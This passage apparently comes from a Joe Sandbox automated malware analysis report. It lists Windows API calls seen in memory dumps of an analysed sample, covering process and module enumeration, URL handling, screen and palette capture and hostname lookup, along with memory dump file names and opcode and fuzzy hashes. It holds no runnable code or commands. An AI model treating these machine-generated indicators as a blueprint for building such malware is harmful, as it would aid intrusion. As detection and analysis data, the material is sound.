• Sleep.KERNEL32(00000000,?), ref: 0BE98CF3
• Sleep.KERNEL32(00000001,00000000,?), ref: 0BE98D0D
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: a2a44e0ef9dddf4becd3ae251ac7c4600880d803a8f241843f4e161edc84fcb0
• Instruction ID: 316e18333c204c8f7df6bc6f20c22e043ecab35b3181c461dcd90b117e4ff835
• Opcode Fuzzy Hash: a2a44e0ef9dddf4becd3ae251ac7c4600880d803a8f241843f4e161edc84fcb0
• Instruction Fuzzy Hash: 1271D0716053008FDB14CF29E984B56BBE4AF86794F18D26ED898CB3E1C770D848CB62
                                                                                  APIs
                                                                                  • InternetCanonicalizeUrlA.WININET(00000825,?,00000824,?), ref: 6A6F1BF3
                                                                                  • GetLastError.KERNEL32(?,00000825,?), ref: 6A6F1BF9
                                                                                  • InternetCanonicalizeUrlA.WININET(?,00000000,00000824,?), ref: 6A6F1C33
                                                                                  • InternetCrackUrlA.WININET(?,00000000,?,02000000), ref: 6A6F1C71
                                                                                  • UrlUnescapeA.SHLWAPI(?,00000000,00000000,02100000,?,00000825,?), ref: 6A6F1C8F
                                                                                  • lstrlenA.KERNEL32(?,?,00000825,?), ref: 6A6F1CA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$Canonicalize$CrackErrorLastUnescapelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2961774178-0
                                                                                  • Opcode ID: 6fc2786b3eafa9d1b6986a1380708ba9aa1fe0cbe9d481a9f6c30e015d8b115a
                                                                                  • Instruction ID: 031bf40caf0c40a78d63dfb703176a36f075adb3e7708af3c983c83251d0cd7a
                                                                                  • Opcode Fuzzy Hash: 6fc2786b3eafa9d1b6986a1380708ba9aa1fe0cbe9d481a9f6c30e015d8b115a
                                                                                  • Instruction Fuzzy Hash: A051C2B0805219DBDB258F65CC80BDA77F6FF4A784F104995EA48A6244DF359AC2CFA0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E0354
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6A6E0366
                                                                                  • Module32First.KERNEL32 ref: 6A6E0380
                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 6A6E03D9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E03E3
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000008,?), ref: 6A6E0437
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleModule32$CreateFirstNextSnapshotToolhelp32_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2655431330-0
                                                                                  • Opcode ID: 495ceb12351b6600130a9a1c45fba861be42a329d57de4e55228dd2ebd556b84
                                                                                  • Instruction ID: 2fe43eb7aeef642920d8280e5bf4447a968fba46cf508aa9187cdb00623f71f3
                                                                                  • Opcode Fuzzy Hash: 495ceb12351b6600130a9a1c45fba861be42a329d57de4e55228dd2ebd556b84
                                                                                  • Instruction Fuzzy Hash: F941C3712093419FD714CB64CC88A6BB3E9FFC9328F168A2DE45987291EF34990ACB51
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0BEB08EB
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0BEB08FA
                                                                                    • Part of subcall function 0BEB08B8: ResetEvent.KERNEL32(00000764), ref: 0BEB08BE
                                                                                  • RtlEnterCriticalSection.NTDLL(0BEFDA98), ref: 0BEB093F
                                                                                  • InterlockedExchange.KERNEL32(0BEF8BC4,?), ref: 0BEB095B
                                                                                  • RtlLeaveCriticalSection.NTDLL(0BEFDA98), ref: 0BEB09B4
                                                                                  • RtlEnterCriticalSection.NTDLL(0BEFDA98), ref: 0BEB0A13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                  • String ID:
                                                                                  • API String ID: 2189153385-0
                                                                                  • Opcode ID: 00052d9043e68cd2cd9f6fc0caf48d63279a19a3e02dc3466980e7b81b27d095
                                                                                  • Instruction ID: 7e5cc903e8af60b03ca9a4c03101f9c82bfc568b2741bf0f110d8c8fb93d3fd3
                                                                                  • Opcode Fuzzy Hash: 00052d9043e68cd2cd9f6fc0caf48d63279a19a3e02dc3466980e7b81b27d095
                                                                                  • Instruction Fuzzy Hash: 6531A034A14704AFE711DFA8D852EAFBBF8EB89700F51E8B0E80596652D735BD04CB61
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0BEB63E6
                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0BEB63F2
                                                                                  • GetDC.USER32(00000000), ref: 0BEB640E
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0BEB6435
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0BEB6442
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0BEB647B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDeviceMetricsSystem$Release
                                                                                  • String ID:
                                                                                  • API String ID: 447804332-0
                                                                                  • Opcode ID: 83c7a973e3e59821309b0b83c781bbbdce372722e46b2744b36cb784a2810597
                                                                                  • Instruction ID: 302234881dc817be06d5e4ce07319b806fccdfac884697d073731d071f6f5fa0
                                                                                  • Opcode Fuzzy Hash: 83c7a973e3e59821309b0b83c781bbbdce372722e46b2744b36cb784a2810597
                                                                                  • Instruction Fuzzy Hash: 90312B74E10604AFEB04DFA8C881EEEFBB5FB89710F109565E918AB390D7709D45CBA1
                                                                                  APIs
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 6A6F0FD3
                                                                                  • GetParent.USER32(?), ref: 6A6F0FE1
                                                                                  • GetParent.USER32(?), ref: 6A6F0FF4
                                                                                  • GetLastActivePopup.USER32(?), ref: 6A6F1005
                                                                                  • IsWindowEnabled.USER32(?), ref: 6A6F1019
                                                                                  • EnableWindow.USER32(?,00000000), ref: 6A6F102C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                  • String ID:
                                                                                  • API String ID: 670545878-0
                                                                                  • Opcode ID: 7b86e14402810d64c4d6d7494b4eac28673867d14e24c0dbcff3baf157cc92a8
                                                                                  • Instruction ID: 27e91e45949ef3b0491ee75a40d2c5b8a3a413e687cba1091ce2363369ef75be
                                                                                  • Opcode Fuzzy Hash: 7b86e14402810d64c4d6d7494b4eac28673867d14e24c0dbcff3baf157cc92a8
                                                                                  • Instruction Fuzzy Hash: A81191726476719BDB618AAA8845B5A66EE6F56FE5F030520ED24E7200EF20CC0386F1
                                                                                  APIs
                                                                                    • Part of subcall function 0BEB66AC: GetObjectA.GDI32(?,00000054), ref: 0BEB66C0
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB681E
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0BEB683F
                                                                                  • RealizePalette.GDI32(?), ref: 0BEB684B
                                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0BEB6862
                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0BEB688A
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB6893
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                   • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                                  • String ID:
                                                                                  • API String ID: 1221726059-0
                                                                                  • Opcode ID: 4d29f39dc704d84efa799bf8cfbf3d5deb41557a64e767a8e2acd81f583653a1
                                                                                  • Instruction ID: 3e19a73ed117b4eeb86e7ff5b94d4804a3c7bd12ba113c52de3a4f9c0f0a9f4f
                                                                                  • Opcode Fuzzy Hash: 4d29f39dc704d84efa799bf8cfbf3d5deb41557a64e767a8e2acd81f583653a1
                                                                                  • Instruction Fuzzy Hash: B9115E75A10208BFDF10DBA8DC81F9FB7FCEF49610F5090A4B918E7280D674AD0487A4
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6DFC97
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 6A6DFCA2
                                                                                  • Process32First.KERNEL32 ref: 6A6DFCBC
                                                                                  • Process32Next.KERNEL32(00000000,00000002), ref: 6A6DFCD1
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000002), ref: 6A6DFCDB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6DFD00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4012237829-0
                                                                                  • Opcode ID: 3f524855b8907d5c805de61f7ab25981f4ed044805a7462cfb324a392bda3f9f
                                                                                  • Instruction ID: 20befa5e8b5d2ec5ae81441b9cf9a12db0feb5da9b3e033973c9c69fd98ca2dc
                                                                                  • Opcode Fuzzy Hash: 3f524855b8907d5c805de61f7ab25981f4ed044805a7462cfb324a392bda3f9f
                                                                                  • Instruction Fuzzy Hash: A61106716052805BD710EB39DC4AEEF77E8AFCA318F45082DE959C2180EF34A909C6E2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cleanup$Startup__strlwr_memsetgethostname
                                                                                  • String ID:
                                                                                  • API String ID: 1390831569-0
                                                                                  • Opcode ID: ec433498f047e39757bb06c6f8b651332ca7c0cded06797911033e41cd0cc908
                                                                                  • Instruction ID: d80051221cae308cf5c2c83f38ad13c3089b6128a03fb16c37fddf9f5d4d63c4
                                                                                  • Opcode Fuzzy Hash: ec433498f047e39757bb06c6f8b651332ca7c0cded06797911033e41cd0cc908
                                                                                  • Instruction Fuzzy Hash: CD11E9706082419BDB649B74C85EBEF3BEA7F87308F44051DE589C61C1EF7065088A93
                                                                                  APIs
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB6059
                                                                                  • SelectObject.GDI32(00000000), ref: 0BEB6062
                                                                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,?,00000000), ref: 0BEB6076
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0BEB6082
                                                                                  • DeleteDC.GDI32(00000000), ref: 0BEB6088
                                                                                  • CreatePalette.GDI32 ref: 0BEB60CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                                  • String ID:
                                                                                  • API String ID: 2515223848-0
                                                                                  • Opcode ID: f27efffbe91abd098c644515ed724fe23619b0869672f49119dbc89425f969c9
                                                                                  • Instruction ID: a0dbfdf345f5f54376d38ebbbf34009810d6f8f15c4dc8133ecf6c04d96b2b4d
                                                                                  • Opcode Fuzzy Hash: f27efffbe91abd098c644515ed724fe23619b0869672f49119dbc89425f969c9
